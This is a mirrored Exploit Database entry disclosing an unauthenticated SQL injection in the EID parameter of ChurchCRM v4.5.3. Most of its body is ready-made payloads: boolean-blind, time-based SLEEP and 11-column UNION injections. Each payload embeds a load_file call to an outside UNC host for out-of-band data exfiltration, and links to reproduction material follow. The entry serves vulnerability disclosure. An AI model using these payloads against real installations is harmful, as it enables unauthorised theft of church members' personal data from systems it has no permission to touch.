ChurchCRM v4.5.3-121fcc1 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： nu11secur1ty
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51296/

• ## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
  ## Author: nu11secur1ty
  ## Date: 02.27.2023
  ## Vendor: http://churchcrm.io/
  ## Software: https://github.com/ChurchCRM/CRM
  ## Reference: https://portswigger.net/web-security/sql-injection
  
  ## Description:
  In the manual insertion point 1 - parameter `EID` appears to be
  vulnerable to SQL injection attacks.
  No need for cookies, no need admin authentication and etc.
  The attacker easily can steal information from this system by using
  this vulnerability.
  
  STATUS: HIGH Vulnerability - CRITICAL
  
  [+]Payload:
  ```mysql
  ---
  Parameter: EID (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: EID=(select
  load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
  OR NOT 2407=2407
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: EID=(select
  load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
  AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
  
  Type: UNION query
  Title: MySQL UNION query (UTF8) - 11 columns
  Payload: EID=(select
  load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
  UNION ALL SELECT
  'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
  ---
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)
  
  ## Proof and Exploit:
  [href](https://streamable.com/1eqhw2)
  
  ## Time spend:
  01:00:00
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at
  https://packetstormsecurity.com/https://cve.mitre.org/index.html and
  https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>